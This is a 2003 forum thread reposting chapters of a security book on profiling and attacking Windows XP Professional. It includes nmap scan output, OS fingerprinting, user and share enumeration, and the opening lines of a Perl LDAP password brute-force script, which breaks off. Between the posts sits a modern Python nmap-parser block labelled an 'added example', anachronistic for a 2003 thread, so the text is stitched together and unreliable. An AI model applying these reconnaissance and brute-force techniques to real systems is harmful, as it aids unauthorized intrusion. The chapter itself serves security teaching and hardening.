XP attacking



yuna_admirer
31-03-2003, 16:29
These are some quite good articles; if you like them, translate and read them yourself.
Excerpted from: Special Ops



Introduction

During his keynote speech at Comdex 2001, Larry Ellison, CEO of Oracle, made the broad statement that his database technology, Oracle 9i, was “unbreakable.” Mr. Ellison then went on to say that users could “keep their Microsoft Outlook and we will make it unbreakable; and unbreakable means you can’t break it, and you can’t break in.” Later on in his presentation, he went on to talk about the significant resources that had been spent and focused on research and development and security defenses within the database code itself in addition to its revamped clustering capability. Soon after, David Litchfield, a database security expert, announced that he had found numerous bugs in Oracle, thereby allowing him to add an administrative account remotely in an unauthorized manner. What does this tell you? Nothing is “unbreakable,” and don’t ever challenge the hacker community.

Another example of a gutsy initiative that had an opposite outcome was Bill Gates’s XP statement. In cooperation with his marketing executives, Gates stated that “Microsoft Windows XP is Microsoft’s most secure operating system, ever.” Soon after the declaration, vulnerabilities in Windows XP were discovered. According to statistics from the annual CSI/FBI Computer Crime Surveys, when measured by frequency of vulnerabilities and release time, XP doesn’t even come close to the few initial bugs released for Windows 3.1. The point: Bill Gates made a bold statement; only if XP is configured properly does his statement stand true that Microsoft Windows XP is the most secure Windows platform to date.

It is obvious that a great deal of research and architecture redesign thought cycles went into the Microsoft Windows XP release. Besides the appealing physical appearance and graphical interface, dramatic increases in speed, media enhancements, user-friendly interface add-ons, and other efficiencies within the kernel, Windows XP has incorporated several aspects of client-specific security features. Windows XP, similar to Windows 2000 from a remote vulnerability assessment point of view, is very different considering the built-in additional features when conducting a local configuration review or local vulnerability assessment.

Throughout this chapter, you will learn the differences between Windows XP and Windows 2000 and the corresponding advantages and disadvantages. In addition, you will be able to identify and profile a Windows XP Professional system and craft specific attacks to exploit the identified weaknesses. The later part of the chapter deals with locking down or securing Windows XP and the methods that should be taken to ensure unsolicited attacks are not successful on your system. The end of the chapter briefly touches upon system and security maintenance specifically on the current version of Windows XP. As with other chapters in this book, additional resources have been provided so that you can conduct further research or stay abreast of advances in Windows XP technology.

Upgrading to XP Professional versus XP Home

Note that this chapter is written for Microsoft Windows XP Professional. A few areas in the chapter reference both Windows XP Home and Windows XP Professional by using the broad reference “Windows XP.” Aesthetically, there is no difference between Windows XP Professional and Windows XP Home, but there are a few technological feature differences between them. The most fundamental difference between the two is that only Windows XP Professional can be joined to a domain. Windows XP Home and Windows XP Professional both are capable of logging into or joining a workgroup, a technology that is geared towards small business and home-based networks but not excluded from professional use. Domain authentication, a strictly for-business technology, allows systems usage of domain-provided resources such as printers, file servers, internal organization Web sites, and so on.

In addition to not having domain authentication, XP Home users do not have access to the XP Professional Remote Desktop feature. The Remote Desktop Protocol (RDP) feature is similar to another popular feature, Terminal Services. Terminal Services and Remote Desktop allow you to leave your computer booted so that you can connect to it remotely via a Terminal Services client or RDP just as if you were sitting at the console. An excellent feature, similar to popular products like Symantec’s PCAnywhere, it provides remote administration and usage capabilities with Microsoft standard authentication and encryption. Another feature related to working remotely is the Working with Offline Files option. This provides a user the ability to create mirrors of networked folders, allowing such users the ability to update files while offline. The key component of this feature is that it can automatically synchronize the folder with the online folder when the connection is available. The synchronization component is mutual—the client updates the server and vice versa.

On a performance note, XP Home does not support dual processor capabilities. Hence, it would not be the ideal platform of choice for a high-end system that would require processor-intense utilizations such as graphics systems, highly utilized streaming media servers, or even an enthusiast’s computer gaming station.

Lastly, XP Home does not come with the Encrypting File System (EFS), potentially the most significant security-related feature. Microsoft really hit home with this feature by making it extremely simple to use and allowing all of the actual cryptography functions, encryption and decryption, to execute “behind the scenes.” In XP Professional, all you have to do to utilize EFS to encrypt a file is right-click the file and click Properties. Click on the General tab then click Advanced. As shown in Figure 4.1, to encrypt the file you must just check the Encrypt Contents to Secure Data option. There is no need for key management or additional passphrases to remember. In most cases, the EFS feature alone should be reason enough to upgrade to XP Professional rather than XP Home.

www.syngress.com

yuna_admirer
31-03-2003, 16:36
Windows XP Features

The Microsoft Windows XP platform provides key features and enhancements over previous products, which is sure to make it the workstation OS of choice going forward. You must realize that even though some of the features and enhancements may not initially appear to be security-related, it is important to know the OS differences especially if you have to do any type of local configuration analysis or forensic discovery. Windows XP integrates the best of the best when it comes to features from previous Windows-OS versions. It has implemented almost all of the security features within Windows 2000, including the rule-based and role-based security frameworks. In addition to security, it has also implemented many of the user-friendly features from the Windows 95/98/ME era, including the Plug and Play component (which I exploit later in the chapter), quick time to boot, and easy user-based localized management.

The following sections detail most of the application and platform features included within the default build of Windows XP Professional, both security and bundled applications. Once you become familiar with the core-OS features, their functionality, and the benefits of using them, you will have a complete understanding of the platform and some necessary details for exploiting or defending components and bundled applications. The bundled applications may not be directly associated to the platform’s security posture, but they are required to completely understand the significant platform modifications.

Note: If you would like more general information on the platform or its components, visit the Microsoft site at www.microsoft.com/windowsxp.

Bundled Applications

The following applications are bundled within Windows XP Professional by default. Appropriate security-related knowledge and major enhancements or changes to the applications have also been noted. An understanding of the role and usage of these applications will prove valuable in later sections of the chapter (even if some are not directly security-related, they may affect the overall usage/execution of the OS, thereby allowing for certain DoS attacks to work or for other vulnerabilities to be exploitable).

• Increased device driver support: More device drivers for printers, network cards, video cards, and so on are now built into the core operating system. This allows an increased number of nonbundled applications and hardware to be easily added without installing new device drivers. Installing device drivers on Windows XP requires a specific kind of privilege that most administrators do not want to provide to local workstation users. The new additions are specific to XP but will in most cases be incorporated into other future robust Microsoft platforms.

• Decreased system reboot time: Windows XP has significantly modified the operating procedure in efforts to decrease system boot time and restart time. In addition to optimization efforts, far fewer processes are initially launched. Less user time is spent waiting on system booting and restarting. There is no security impact from this modification. It is XP-specific.

• Enhanced Windows Installer: The Windows Installer feature manages driver and application installations, which provides a user with the ability to undo, remove, upgrade, track, or even configure such installed applications. The installer provides users with the previously stated functionality, which more or less decreases the likelihood that an error will occur after software installations. There is no security impact from this modification. It is not XP-specific.

• Intelligent user interface: The Windows Explorer interface (not to be confused with Internet Explorer) actively tracks highly used files, programs, and links in order to make the most used objects the easiest to access by presenting them first. There is no security impact from this modification. It is not XP-specific.

• Web publishing: Local Web pages, files, and folders can easily be published to an online status via any system that uses the WebDAV protocol. The local Web publishing is a simplified File Transfer Protocol (FTP) process designed to minimize time and upload complexity for users. In terms of security impact, the WebDAV protocol is Microsoft-specific and provides only a minimal framework for authentication and layered encryption. If the publishing feature is poorly configured on the server side, any user could use it to upload and overwrite current “production-status” files. It is not XP-specific.

• Media enhancements: You can now create CDs from Media Player, view DVD movies because of the new built-in decoders and DVD software, take part in video conferences, listen to Internet radio, and actively set numerous types of files to be automatically executed. These enhancements offer significantly better audio and video compatibility with newly supported compression and encoding techniques. It saves users the time and effort of installing third-party software. Currently there is no significant security risk with the media enhancements, but note that Media Player now executes far more files with uncommon extensions in an attempt to automatically play. The danger exists because you must trust the files you download and store locally. Media Player and Windows Explorer were modified to automatically execute some files just by clicking once on the file or in some cases hovering over it. These enhancements are XP-specific.
Attacking and Defending Windows XP Professional • Chapter 4 91

• Advanced Configuration and Power Interface (ACPI): A feature geared towards the professionals who travel frequently, ACPI provides an easy-to-use interface allowing the user full control over Plug and Play compatibility, hot docking, and power management. The most useful feature of ACPI is that it allows the user to configure the type of power usage, thereby potentially increasing the time of system usage. There is no security impact, but multiple vulnerabilities were identified in the Windows Plug and Play feature. The enhanced application programming interface (API) for ACPI is XP-specific.

• Wireless support: Windows XP has bundled in device driver support within the overall driver database, which allows for numerous commonly used cards such as Linksys, SMC, and Cisco to be used via Plug and Play. This support decreases user installation time by allowing multiple cards to use some generic drivers that are preinstalled within Windows XP. In terms of security impact, major computer vendors including Toshiba and Dell are creating laptops with built-in 802.11 wireless cards that are compatible with the drivers installed within Windows XP. Uneducated wireless users are vulnerable targets to numerous types of protocol and application-layer attacks. This enhancement is XP-specific (Windows XP is the first Microsoft platform with built-in support).

• Network location identification: The network location feature allows the system to automatically identify whether the system has been changed. The network card sends out a set of initiation broadcasts when it notices that the cable has been disconnected and reconnected. It allows the system to automatically configure the network card and use network resources in an efficient manner. In terms of security impact, the card initiation sequence is easily fingerprinted, thereby allowing an attacker to identify a new system on the network by capturing the broadcast messages and replies from the other network devices and systems. This feature is XP-specific.

• Remote Assistance: The Remote Assistance (RA) feature allows users to share complete or partial access to their user environments. The feature allows connected users the ability to see the screen, control the pointer, and input keystrokes from their own local keyboards. This feature was designed for IT administrators, network support, and distributed peer working groups to minimize third-party administration utilities and allow users to assist in problems remotely. To put it simply, it saves walking time. However, if improperly configured, RA could potentially allow access to unauthorized users via an encrypted RDP 5.5 tunnel. This feature is XP-specific (other facets of this existed previously, but this version is significantly enhanced).

• System restore: The Windows XP system restore function allows users to restore a system to that of an earlier snapshot. These snapshots are created automatically, thereby allowing the user to specify the desired state to roll the system back to. It provides an additional layer of system recovery that can be leveraged by users in the case that the system needs to be restored. It also potentially saves time and data from what could have been a potential loss. The security impact is that the system restore feature stores the snapshot information into a specific file that can be modified by an attacker. This function is not XP-specific.

• Device driver rollback: The device driver rollback feature, similar in design to the system restore feature, allows an administrator or user to roll back to a previous version of a driver in the case that it has adversely affected the component, OS, or another application. It creates a layer of protection for the user in the case that an older device driver must be reinstalled. The security impact is that a malicious user with Administrator-level access could damage rollback drivers. This function is not XP-specific.

• Application compatibility: This feature acts as a middleware application geared towards fixing the numerous issues spawned from third-party application errors. It provides fixes for these third-party applications even before the vendor has created such fixes. The feature allows more third-party software to run seamlessly with Windows XP. The security impact is that a feature resides within this apparently wonderful feature that allows a user to specify the environment in which the application should execute (such as Windows NT or Windows 95/98/ME). Such a component may allow for additional hybrids of previously published vulnerabilities to be successful. This feature is XP-specific.

• User state migration software: The feature simplifies data migration from another Windows-based system to the newly installed Windows XP system. It saves time and resources for data backup and transfer. There is no security impact. This feature is XP-specific (the back-end processes for the feature have been significantly changed over since previous versions).

• Automatic updates: The automatic update feature allows users to schedule and install relevant system and security updates through Web-based connections to Microsoft. Forced automatic updates for your system ensure that you have the latest versions of software and are kept up-to-date with the security fixes and system patches. There is no security impact (providing that you install the system patches and hotfixes). This function is not XP-specific.

• Windows Update Catalog: The Windows Update Catalog serves as a guide for users to verify that their specific systems have the most up-to-date system fixes. It allows third parties and internal users to create applications that can utilize the catalog to ensure that systems, organizations, and networks remain compliant. There is no security impact from this function. It is not XP-specific.

• Internet Explorer 6 Administration Kit: The Internet Explorer 6 (IE6) Administration Kit allows for an Administrator to configure media settings, security policy settings, and personalized features and to download rule sets. The feature allows network engineers and administrators increased flexibility for the deployment of IE. There is no security impact from this feature. It is not XP-specific.

• Remote OS installation: The remote OS installation is not unique in design, but it allows users to install Windows XP and other subsequent operating systems over the network, provided that your network has implemented an Active Directory (AD) infrastructure. The obvious benefit is that it saves time for administrators and decreases install complications. There is no security impact from this feature, as long as the “Install Tunnel” is trusted. It is not XP-specific.

• Windows Management Instrumentation (WMI): The WMI is one of the great features for third-party developers who desire their software to interact with the Microsoft OS. It provides an adequate API for accessing system resources. It allows Administrators to manage system resources using internally developed or third-party applications. An excellent resource! There are numerous security concerns for this feature, all of which revolve around the concept of keeping this API secure and allowing only Administrators to utilize it. It can control just about all of the Microsoft Windows platform or at least anything important. This feature is not XP-specific.
• Network bridge: The network bridge feature allows a system to faultlessly transfer or extend communication between different types of networks. It potentially allows one system to communicate via multiple media simultaneously. There is no security impact from this feature. It is not XP-specific (versions of this have existed in the past, yet wireless media is now incorporated).

• Internet Connection Sharing (ICS): The ICS feature is geared towards home networks and small businesses that require Internet connection services for a small number of systems. It allows one system to act as the network relay to the Internet, thereby sharing bandwidth. ICS has built-in functions to include network address translation (NAT), system addressing, and domain name resolution services (DNS). It saves money and network device resources by allowing others to simply connect via the specified system. In terms of security impact, if the ICS server were compromised, all data going to and from the systems on the local network to the Internet would be compromised since it is routed through the ICS server. Sessions could be hijacked and/or redirected, DNS could be corrupted, and the network connection could be killed, to mention a few. Remember, the system is the center for communication and is trusted by the clients. This feature is not XP-specific.

• Dual processor and memory support: Windows XP Professional includes the capability to support dual processors and up to 4GB of memory. This kind of functionality was designed for computer game advocates, graphic designers, engineers, software developers, and others that require powerful processing systems. The feature allows XP Professional to be used in a more CPU/hardware-intense environment. There is no security impact from this feature. It is XP-specific (XP Home does not have this; however, other Microsoft server platforms such as NT and 2000 do have this capability).

• Decreased system reboot frequency: Due to the nature of the modularized environment, Windows XP decreased the number of instances that require system reboots by modifying the system in real-time. The motion is similar to that of a Unix environment. It saves user time and allows for the system to stay in production mode. There is no security impact from this feature. It is XP-specific.

• Dual DLL support: The dual dynamic link library (DLL) support allows users to simultaneously run multiple versions of the same product on the same system. It allows multiple versions of the same product to reside on the system, which is an excellent feature for developers or product support professionals. There is no security impact from this feature (the DLLs do not execute in the same memory space). It is XP-specific.

• Offline files and directories: The feature permits a user to specify network-based files and folders, to which they have proper access, to store, modify, and then resynchronize with the online versions. It allows users to modify network-based resources while offline. In terms of security impact, if proper access is not controlled at the network layer, malicious files could be synchronized upward. For instance, a macro virus could be saved to an online Word document. It is XP-specific (similar, weaker versions of this existed in previous Windows 2000 releases).

• Offline Web page viewing: Offline Web page viewing stores information locally for Web sites that you choose, thereby allowing you to view the pages at a later time. It minimizes the time that a user must be connected to the network, allowing pages or articles to be viewed at a later period of time. The security impact is that if malicious script code or objects were included in the saved Web page, then the storing and reloading of the Web page could adversely affect the system just as if it were online. This feature is XP-specific.

• Microsoft Management Console (MMC): The MMC is an excellent tool that allows a user to manage system settings including users, groups, security policy settings, auditing configurations, hardware, event/system/security logs, applications, and others. It is a great feature that allows administrators to manage all system settings from within a single user interface. There is no security impact (just understand that this is a powerful tool). The tool is not XP-specific.
Security Focused Features

Microsoft invested a significant amount of resources in the design and implementation of the security model for the Windows XP Professional platform. Multiple key tools and features have been added that automatically harden the system or allow the user to further secure XP Professional with a minimal amount of effort. Features range from kernel modifications to encryption tools to software-restriction-based access control lists. The key additions are further detailed throughout this section.

• Kernel data structures: Microsoft has altered the protection schema for kernel data structures to the extent that all of them are read-only. Since the kernel data structures are read-only, there is minimal chance for applications and device drivers to distort them. There is no security impact, unless you have significant experience in reverse engineering assembly code used to create the queued spinlocks. This feature is XP-specific.

• Increased file protection: Windows XP increased the protection for core OS files from being manipulated, overwritten, or deleted during application installations. The protections that were put in place monitor the system calls for file removal, and if an error occurs, the system restore function will allow you to remove the installation. It benefits the user by adding protection to files for post-installation errors. There is no security impact from this feature. It is XP-specific.

• Software Restriction Policies: The additional Software Restriction Policies allow for a policy-driven mechanism to identify software that runs on the local environment. The focus behind the feature is to eliminate numerous virus and Trojan-based threats. It allows for added local protection against malicious application-layer attacks through an enterprise-level mechanism. In terms of security impact, Software Restriction Policies allow administrators to configure policies to disallow the execution of certain types of files. This feature is XP-specific.

• Encrypting File System (EFS): EFS secures system files and folders with an internal secret key derived from user authentication credentials. It is very simple to use, to the extent that you need to just right-click on the file and then select Encrypt. It is an easy method for securing critical files with standard cryptography algorithms. In terms of security impact, in numerous cases EFS is mistaken for a highly secured cryptography algorithm in which the user gets to configure the encryption settings. EFS does not hide files, nor does it secure files in any means besides local encryption. A user would be able to brute-force the file payload if it were to be intercepted or retrieved from the local system. In addition, it may be difficult to recover EFS-encrypted files that have been moved to other systems with different users. This feature is not necessarily XP-specific.
• IP Security (IPSec): IPSec is an Internet Protocol (IP)–layer encryption schema to encrypt data between systems. IPSec is an industry standard in tunnel encryption for internal and external network connections. In terms of security impact, IPSec should be utilized for consistent system-to-system traffic, even in the case of local network virtual private networks (VPNs). This feature is not XP-specific.

• Kerberos: Windows XP is bundled with the Kerberos authentication protocol as a standard for authenticating across numerous types of platforms and devices throughout the network. The standard encrypts all payload data during the authentication process. Kerberos can be utilized for multiple platforms and can be utilized for a single sign-on for Windows 2000 and .NET Server resources. In terms of security impact, all systems should utilize the latest version of Kerberos and an inherent trust between the Kerberos clients and servers. This feature is not XP-specific.

• Smart cards: Embedded smart-card functionality is included by default within Windows XP. It allows you to use a terminal services client to log into smart-card servers or terminal servers with additional third-party smart-card applications. Implementing a smart-card infrastructure provides an excellent method for ensuring that password and authentication schemas are secured. In terms of security impact, smart-card servers should be secured from a local, network, and physical perspective since they are highly trusted systems. This feature is not XP-specific.

• Remote Desktop: The Remote Desktop application allows users to access their machines remotely. It is similar to other remote administration products in that only one session can be executing at a time; hence you cannot be logged on and working locally while another individual is working on a remote session. Remote Desktop currently utilizes Microsoft’s RDP 5.5 communication protocol. It allows users to work on their systems remotely and is excellent for developers who want to connect via a less-powerful laptop and run enterprise-level applications. It is possible for a malicious user to connect to your computer and take control of it via successful authentication credentials. If this were to happen, the malicious user would have the access of the authentication credentials provided. This feature is not XP-specific.

• Credential Manager: Credential Manager serves as a secured location for authentication credentials, usernames, and passwords, so that they may be automatically reused in the future for repeatable logons or access to secured network-based resources. It saves time and repetitive energy from end users that must consistently re-enter usernames and passwords for resource access. Currently, there are no published vulnerabilities that exploit the Credential Manager allowing malicious users or processes the ability to retrieve credentials. This feature is XP-specific.

yuna_admirer
31-03-2003, 16:41
Attacking XP Professional

Attacking Windows XP Professional is similar to attacking other Microsoft operating systems—and yes, some of the same attacks work. However, a few differences arise when you are attacking a system that has implemented some of the key security features within the XP Professional environment. In the following section, you will learn to profile and identify the OS in an organizational environment in addition to learning to identify a system with the XP Internet Connection Firewall implemented. You will also learn the details for the most critical attacks that currently exist specifically for the XP Professional platform.

Of course, numerous tools and techniques are available to profile and exploit Windows-based operating systems and applications. Throughout this portion of the chapter I have therefore utilized a subset of these many security tools in combination with public and author-developed exploits. The tools and techniques we’ve chosen to present represent a good method for testing and exploiting the given targets.

Profiling Windows XP Professional

The attacker modus operandi differs from person to person; however, most attackers will agree that they need to gain a substantial amount of information about a target before attempting any attacks. In the initial chapters of the book, you learned a good methodology for profiling or footprinting a target system. It is not uncommon for attackers to profile a target system and its applications for a significant amount of time (this could be about 80–90 percent of the overall assessment time). Our profile of Windows XP will encompass all of the techniques and tactics utilized during an above-average vulnerability assessment. It will not encompass utilizing packet replay attacks or additional machines for packet capturing or man-in-the-middle attacks. It is important to note that the profile was created and the tools were executed in a non-evasive manner. Some of the results may be different if you want to bypass intrusion detection systems or filtering systems.

The Windows XP Professional Target

The XP Professional profile that we’ll develop in this chapter is meant to accurately
detail what services, protocols, and responses can be ascertained from footprinting
a default installation of XP Professional without any installed patches or
hotfixes. We'll use the profile later as an identifier for potential target injection
points and methods for determining which attacks and nudge strings will return
what types of information without actually executing the attacks.
Profiling the XP Professional target in this case will consist of determining
what ports are open on the system and corresponding services, identifying system
users and shares, gathering implemented protocols, and analyzing protocol
responses. Analysis of this information will enable you to potentially glean
exploitable holes and security injection points within XP Professional.

Port Scanning

An excellent method of determining active services and open ports on a system
is to run a complete port scan of the target system. When conducting a profile of
a local or remote system and you are not concerned with evading intrusion
detection systems, it is always recommended to go with a full
TCP Connect scan. The following scan output displays what NMAP 3.0 would
show if you ran a full port scan via the SYN or TCP Connect methods:
Starting nmap V. 3.00 ( www.insecure.org/nmap )
Interesting ports on 10.0.100.100:
(The 65535 ports scanned but not shown below are in state: closed)
Port State Service
135/tcp open loc-srv
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open UPnP
Remote operating system guess: Windows Millennium Edition (Me),
Win 2000, or WinXP
Nmap run completed -- 1 IP address (1 host up) scanned in 37 seconds
The following is a full-blown UDP scan of the XP Professional target system:
Starting nmap V. 3.00 ( www.insecure.org/nmap )
Interesting ports on 10.0.100.100:
(The 65523 ports scanned but not shown below are in state: closed)
Port State Service
123/udp open ntp
135/udp open epmap
137/udp open netbios-ns
138/udp open netbios-dgm
445/udp open microsoft-ds
500/udp open isakmp
1026/udp open unknown
1029/udp open unknown
1033/udp open unknown
1900/udp open unknown
8195/udp open unknown
42811/udp open unknown
Nmap run completed -- 1 IP address (1 host up) scanned in 47 seconds
As you can see, the system has some open TCP and User Datagram Protocol
(UDP) ports. Now, the differences that you may not initially notice are what ports
differ from previous platforms, including Windows 2000 and NT. Port 445, commonly
utilized in XP for authentication purposes, is a Windows 2000- and XP-specific
port and stands for Microsoft Direct Host. Numerous other tools exist
that run port scans; similarly, you can probably find a port scanner written in just
about every network-based programming language, plus this functionality is
built into just about every commercial and public vulnerability scanner.
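The two scans above can be folded into one host record and checked for the ports the chapter singles out (445/tcp Direct Host, the NetBIOS ports, and the UPnP service on 5000/tcp and 1900/udp). This is an added example for this page, not code from the book or from nmap; the two transcripts embedded in it are constructed to match the quoted scan results.

```python
"""Summarise Windows 2000/XP-specific exposure from nmap 3.0 text output.

Added example (not the chapter's own code). The scan transcripts below are
constructed to mirror the results quoted in the Port Scanning section so the
parser can be run offline."""
import re
from dataclasses import dataclass, field

# Ports the chapter associates with an unpatched XP Professional install:
# 445/tcp (Microsoft Direct Host) exists only on Windows 2000 and later,
# 5000/tcp and 1900/udp belong to the Universal Plug and Play service.
DIRECT_HOST = ("tcp", 445)
UPNP_PORTS = {("tcp", 5000), ("udp", 1900)}
NETBIOS_PORTS = {("tcp", 135), ("tcp", 139), ("udp", 137), ("udp", 138)}

HOST_RE = re.compile(r"Interesting ports on \(?([\d.]+)\)?:")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*$", re.MULTILINE)


@dataclass
class HostProfile:
    address: str
    # (protocol, port) -> service name as reported by nmap
    open_ports: dict = field(default_factory=dict)

    def has_direct_host(self) -> bool:
        return DIRECT_HOST in self.open_ports

    def exposes_upnp(self) -> bool:
        return any(p in self.open_ports for p in UPNP_PORTS)

    def netbios_ports(self) -> set:
        return NETBIOS_PORTS & set(self.open_ports)

    def likely_2000_or_xp(self) -> bool:
        # The chapter's rule of thumb: 445 alongside the classic NetBIOS
        # session port points at Windows 2000 or XP rather than NT.
        return self.has_direct_host() and ("tcp", 139) in self.open_ports


def parse_nmap(text: str, profile: HostProfile = None) -> HostProfile:
    """Fold one nmap transcript into a HostProfile.

    Passing an existing profile merges a second scan (for example the UDP
    run) into the same host record; the addresses must agree."""
    m = HOST_RE.search(text)
    if m is None:
        raise ValueError("no 'Interesting ports on' line found")
    address = m.group(1)
    if profile is None:
        profile = HostProfile(address)
    elif profile.address != address:
        raise ValueError(f"scan is for {address}, profile is for {profile.address}")
    for port, proto, state, service in PORT_RE.findall(text):
        if state == "open":
            profile.open_ports[(proto, int(port))] = service
    return profile


def exposure_report(profile: HostProfile) -> list:
    """Findings a defender would act on, derived from the open-port set."""
    findings = []
    if profile.has_direct_host():
        findings.append("445/tcp open: SMB reachable directly over TCP")
    if profile.exposes_upnp():
        findings.append("UPnP reachable (5000/tcp and/or 1900/udp): patch MS01-059 or disable the service")
    if profile.netbios_ports():
        findings.append("NetBIOS ports open: null-session enumeration of users and shares is possible")
    return findings


# Constructed transcripts modelled on the scans quoted above.
TCP_SCAN = """Starting nmap V. 3.00 ( www.insecure.org/nmap )
Interesting ports on 10.0.100.100:
(The 65535 ports scanned but not shown below are in state: closed)
Port State Service
135/tcp open loc-srv
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open UPnP
"""

UDP_SCAN = """Starting nmap V. 3.00 ( www.insecure.org/nmap )
Interesting ports on 10.0.100.100:
Port State Service
123/udp open ntp
137/udp open netbios-ns
138/udp open netbios-dgm
445/udp open microsoft-ds
1900/udp open unknown
"""

if __name__ == "__main__":
    prof = parse_nmap(UDP_SCAN, parse_nmap(TCP_SCAN))
    print(f"{prof.address}: likely Windows 2000/XP = {prof.likely_2000_or_xp()}")
    for line in exposure_report(prof):
        print(" -", line)
```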

yuna_admirer
31-03-2003, 16:42
ICMP Discovery and Fingerprinting

The Internet Control Message Protocol (ICMP) is one of the most useful protocols
when you are attempting to profile a remote system. Identifiable anomalies
in the protocol allow you to make an educated guess about the alleged operating
system of the target host. The obvious benefit of knowing the target operating
system is pinpointing the classification of attacks for that particular OS. In addition
to ICMP, other means of analysis (such as banners, services, and protocols)
make for other excellent additions to any OS fingerprinting methodology. Almost
all vulnerability scanning products implement some form of OS identification,
but the standout industry standard is NMAP’s OS Fingerprinting library. As such,
numerous scanners simply implement the NMAP capability. In addition to
NMAP, other proprietary OS detection tools within products include FoundScan
and ISS. You can find additional vendor product-specific implementation details
at their respective Web sites.

- Retina: www.eeye.com
- NMAP: www.insecure.org/nmap
- Foundscan: www.foundstone.com
- ISS: www.iss.net
Another excellent source for information is www.sys-security.com/html/
projects/icmp.html. Ofir Arkin, founder of the Sys Security Group, has done
extensive research into ICMP and published a wide range of papers, tools, and
intrusion detection signatures that may prove educationally beneficial.
The following NMAP output shows that the NMAP OS detection function
limited the OS down to one of three potential operating system matches. (If you
look ahead in the chapter to Figure 4.2, eEye’s Retina only narrowed the potential
OSs down to four.)
Starting nmap V. 3.00 ( www.insecure.org/nmap )
Interesting ports on (10.0.100.100):
Port State Service
139/tcp open netbios-ssn
Remote operating system guess: Windows Millennium Edition (Me), Win 2000,
or WinXP
Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
To utilize the NMAP OS detection function, you must scan and receive a
response for a minimum of one open port. A good port to search for on
Microsoft-based operating systems is 139, the common NetBIOS port, when utilizing
NMAP to determine OS type.

yuna_admirer
31-03-2003, 16:49
Gathering Pertinent System Information

- MAC address: The Media Access Control (MAC) address is utilized as
an addressable reference below the Network and Application layers for
direct system-to-system communication. In most cases, a user can determine
what type of network card is being utilized by determining the
MAC address on that card. In addition to gathering target information,
the MAC address can be utilized to spoof a target address and in-session
hijacking attacks.
- Hostname: A system's hostname is another way for addressing or referencing
a specific computer system and can be leveraged in a number of
man-in-the-middle and direct attacks. In most cases, a type-full system
hostname will also include network- and domain-specific information.
- Route to host: The route to the host is an identifiable route or map to
the target system. In most cases, you can learn the IP addresses of each
system that your packet transfers through on the way to the target
system. Discovering the relevant host route is pertinent because it allows a user the ability to potentially compromise or target nearby systems in
hopes that it may provide advantages in compromising the initial target
system. In addition, multiple routes can potentially be analyzed to create
a network map of the target system's environment.
- Authentication server: Authentication servers take numerous forms,
and in this case, systems such as the domain controllers, Kerberos servers,
or Public Key Infrastructure (PKI) servers are popular targets because
they store system authentication credentials.
- DHCP server: The Dynamic Host Configuration Protocol (DHCP)
server provides IP address information to systems joining a network.
Information pertaining to the leased address space, other networked systems,
and the network in general can be ascertained from a DHCP
system compromise.
- DNS server: The server that provides domain name information to the
target system is a key piece of information and can be leveraged in multiple
Address Resolution Protocol (ARP) cache attacks, such as the popular
ARP cache poisoning attack.
- Default router or gateway: The default router or gateway is the
system that receives all of the communication between that system and
the outside world. If the target system is communicating with another
system outside of the local network, the default gateway will transmit
packets to the appropriate gateway in its local table of gateways. Note
that the default gateway is one of the most popular targets when
attempting to compromise a system.
Most of these can be determined without authentication if you have the
ability to capture packets off the network segment on which the target system
resides. If you do not have local access, you may have a difficult time getting the
MAC address and corresponding servers. Vulnerability scanners such as Retina
and FoundScan retrieve just about all of this information if available. Other
tools you may want to use are GetMAC and CTIS (you can find both at
www.packetstormsecurity.org), nslookup, tracert, and Ethereal. Nslookup and tracert
(the Unix version is Traceroute) are bundled with almost all Windows and Unix-based
operating systems. Ethereal's site is www.ethereal.org.

Enumerating Users, Groups, and Shares

Just as with any operating system, Windows XP Professional has built-in users and
groups. These users can be enumerated in addition to user groups and shares. The
system shares configured by default that are remotely accessible are tied into specific
system directories. For instance, the C$ share maps back to C:\ and the
Admin$ share maps back to C:\Winnt\. The IPC$ share is remotely available for
anonymous users to use null session connections.
Groups configured on XP Professional by default include the following:

- Administrators
- Power Users
- Guests
- Backup Operators
- Remote Desktop Users
- Users
- Replicator
- Debug Users
- HelpServicesGroup
- Network Configuration Operators

Users configured on XP Professional by default include the following:

- Administrator
- Guest (disabled)

Shares configured on XP Professional by default include the following:

- C$
- Admin$
- IPC$

The eEye Retina vulnerability scanner, pictured in Figure 4.2, is a relatively
good tool that can be quickly used to profile a target system. Trial versions can
be downloaded and used for 15 days without any end user cost. Figure 4.2
shows a full Retina vulnerability and port scan executed against our target XP
Professional system. As you can see, Retina identified the open shares, TCP ports, hypothesized OS, MAC, and a route-to-host, which was omitted. In addition to
these, it identified multiple other services and protocols implemented on the box.
Tools such as Retina simplify the profiling process and can quickly execute
numerous attacks.

yuna_admirer
31-03-2003, 16:52
Exploiting Windows XP Professional

Windows XP Professional has numerous vulnerability injection points that can be
exploited to provide a malicious user with privileged access or deny service to a
user or all users attempting to utilize the target system. The injection point types
can be categorized in three manners:

- Remote exploits
- Local exploits
- Miscellaneous exploits and vulnerabilities

Remote and local exploits are simply the method in which the vulnerabilities
are exploited. For example, the remote exploits are network-based and in most
cases are spawned from a system different than the target system. The local
exploits are either local vulnerabilities, such as privilege escalation or race conditions,
or client-side bugs that initiate from the target system. Internet Explorer
vulnerabilities are a perfect example of local exploits because you place a reasonable
amount of trust in the data of a Web server that you are connecting to and
because you initiated the connection.

Remote Exploits

The following exploit examples (LDAP attacks, the Plug and Play Denial of
Service attack, and XP access point information disclosure) are remotely
exploitable on the XP Professional operating system. All of these have been conducted
and carried out on the same system that was used to conduct the system
profile shown previously. Especially for the remote system exploits, some of these
vulnerabilities have the potential to inflict damages on the local system of the
malicious user.

LDAP Attacks

The Lightweight Directory Access Protocol (LDAP) is a specialized database
technology based upon the X.500 standard that allows a user or system to categorize
entries in a hierarchical structure. One of the big advantages and selling
points for LDAP is that it is cross-platform and standards-based, which easily
allows for developers to create client and server software to speak the LDAP language.
The following code is written in Perl and effectively targets LDAP servers
and attempts to brute force manager accounts housed within an LDAP database.
All of the error checking and input validation was removed in addition to the
efforts made to streamline some of the code. It will execute a dictionary-style
attack on an account, thus attempting to exploit a weak user password.

#! /usr/bin/perl
# ldap.pl
# Created By: Victim1
# Modified By: James C. Foster
# Don't mess up, there is no error checking or input validation
use Getopt::Std;
# Getting Attack Options
